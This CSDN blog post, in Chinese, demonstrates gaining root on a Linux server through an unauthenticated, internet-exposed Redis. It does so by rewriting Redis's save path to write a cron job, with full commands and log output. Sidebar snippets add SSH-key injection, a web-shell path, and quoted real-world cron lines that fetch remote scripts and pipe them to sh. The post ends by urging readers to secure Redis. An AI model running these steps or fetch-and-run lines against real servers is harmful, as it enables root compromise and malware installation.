借redis之手入侵服务器

最新推荐文章于 2023-11-24 20:17:19 发布
最新推荐文章于 2023-11-24 20:17:19 发布
阅读量412 收藏
点赞数
分类专栏: Redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sawyerlan/article/details/104711259
版权

说明

利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。

原理

远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。

入侵演示

1. 编译安装并配置

redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可

bind 0.0.0.0  #允许所有ip连接
protected-mode no  # 关闭保护模式
daemonize yes #后台运行
# redis安装后默认配置是免密码的
2. 启动redis
# 这里是root直接启动,入侵后就得到了root权限
/usr/local/redis/bin/redis-server redis.conf
3. 入侵
3.0 连接redis

使用redis-cli工具直接连接redis

redis-cli -h jiankongshuo.com -p 6379
3.1 清空redis所有数据
flushall
3.2 修改redis 数据目录

这里设置为计划任务子目录

config set dir "/etc/cron.d/"
3.3 修改dbfilename
config set dbfilename imin
3.4 设置键值并保存
set test "\n*/1 * * * * root echo 'HaHa,I am in!'>/root/redis\n"
save
3.5 验证是否写入计划任务文件
cat /etc/cron.d/imin
REDIS0009	redis-ver5.0.7
redis-bits󿿀򳨭escused-mem 
𮤭preamble~󃳥st3
*/1 * * * * root echo 'HaHa,I am in!'>/root/redis

乱码及上面的redis信息不用管,计划任务会执行

3.6 验证计划任务是否执行
tail -1f /var/log/cron 
Mar  7 11:34:01 jiankongshuo CROND[10348]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
Mar  7 11:35:01 jiankongshuo CROND[10352]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
Mar  7 11:36:01 jiankongshuo CROND[10354]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
Mar  7 11:37:01 jiankongshuo CROND[10356]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
3.7 验证计划命令结果
 cat  /root/redis
 HaHa,I am in!

至此,redis入侵演示完毕。
环境说明

  1. 操作系统 CentOS8
  2. redis 编译参数 make install PREFIX=/usr/local/redis
  3. redis版本Redis server v=5.0.7

特殊说明
使用yum安装的redis (也是root启动)不会有这个问题,文件一直被限制在/var/lib/redis 下面。 而自己编译安装进行攻击,目前我还不清楚yum安装的是否有其他编译参数限制了redis的数据目录,从而更加安全。
最后,请大家务必关闭redis的外网访问,切一定要设置redis强密码。

参考 https://blog.csdn.net/kouryoushine/article/details/87917762

如果你觉得本文对你有所帮助,欢迎关注!
https://segmentfault.com/img/bVbAYdT/view

在这里插入图片描述

一只核心Bug
关注
专栏目录
记一次阿里云上Redis服务器入侵的经历
qq_25968703的博客
06-02 3779
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
redis导致java的cpu过高,redis 漏洞造成服务器入侵-CPU飙升
weixin_39958631的博客
03-12 666
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
利用redis入侵服务器
weixin_43641575的博客
01-17 726
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。 一,生成本地ssh公钥 ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面 二,先连接redis看看 telnet 10.10.10.102 6379...
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6325
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1295
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt# re...
redis被黑客入侵
程序员陆通
02-12 1502
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 949
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
记录一下五天前的晚上阿里云服务器redis入侵的经历
weixin_43938739的博客
05-17 855
我是个普通大二学生,最近做项目需要部署到服务器上,于是我月初在阿里云买了个小服务器,安装好jdk,tomcat,mysql,redis就没管了,第一次弄服务器,没什么经验,当时漏洞我没管,打算有空再搞.redis密码也没设置(太蠢了),端口还是默认的6379对外网开放. 就这么相安无事过了7天吧,那天晚上还在打游戏,看到阿里云发来的短信心头一紧,马上上去看,被入侵了,查了一会,发现是挖矿木马,就是如下这种 https://zhuanlan.zhihu.com/p/54610161 我上来就登录redis f
渗透服务器修改数据,渗透测试之:从端口入侵服务器
weixin_42617406的博客
07-31 2028
Web应用服务端口渗透HTTP服务:对于http服务其实是我们目前这几年比较常见的攻击入口,所以这里会针对http服务进行一个详细的详解;注:这个板块的所有攻击方式,如果涉及到常规的web漏洞不会提出来,除非是特定的服务器才会产生的漏洞;IIS服务默认端口:80/81/443攻击方式:IISPUT写文件:利用IIS漏洞,put方法直接将文件放置到服务器上短文件名泄漏:这种一般没啥影响解析漏洞:详细...
阿里云服务器搭建redis-6.2.6集群
qq_47067442的博客
11-20 1089
由于资源有限,文章以搭建伪集群为例,即以单个服务不同的端口搭建redis集群,实现在公网可以直接访问 1.新建redis集群安装目录,并且在每个目录下新建data目录,用于保存redis数据 mkdir /usr/local/redis-cluster/redis-500{1,2,3} 2.从官网https://redis.io/download下载Redisredis-6.2.6 wget https://download.redis.io/releases/redis-6.2.6.tar.
redis 入侵
Henry_Wu001的专栏
07-22 259
redis 入侵
linux 连接redis_借redis之手入侵服务器
weixin_39647734的博客
11-26 168
说明利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。原理远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。入侵演示#### 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可bind 0.0.0.0 #允...
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2221
单位ip被电信拉黑,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
谨防利用Redis未授权访问漏洞入侵服务器
最新发布
weixin_42100387的博客
11-24 1836
谨防利用Redis未授权访问漏洞入侵服务器
python如何入侵服务器的_通过redis入侵服务器的步骤
weixin_42524276的博客
01-12 586
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。一,生成本地ssh公钥ssh-keygen二,先连接redis看看telnet 192.168.15.10 6379redis-cli -h 192.168.15.10三, 清一下re...
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 7044
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
Redis入侵小结
LIVE
02-26 331
如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:   开启redis客户端   输入以下命令来连接远程redis   redis-cli -h 125.39.185.150 -p 6379   接下来,在远程redis内存中设置数据:   config set dir /var/www/html(在内存中设置切换的web目录/var/www/html) ...
redis入侵小结
weixin_33953249的博客
09-23 146
redis安装:   windows安装包:http://pan.baidu.com/s/1i3jLlC5   下载下来之后,开始安装:   redis-server.exe redis.conf:     简单一步,安装成功,保持这个windows持续运行~   查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~   ...
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1580
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
Redis 也能被攻击?一次Redis入侵的记录
探索云原生
12-05 5669
通过 RDB 方式入侵Redis 被攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值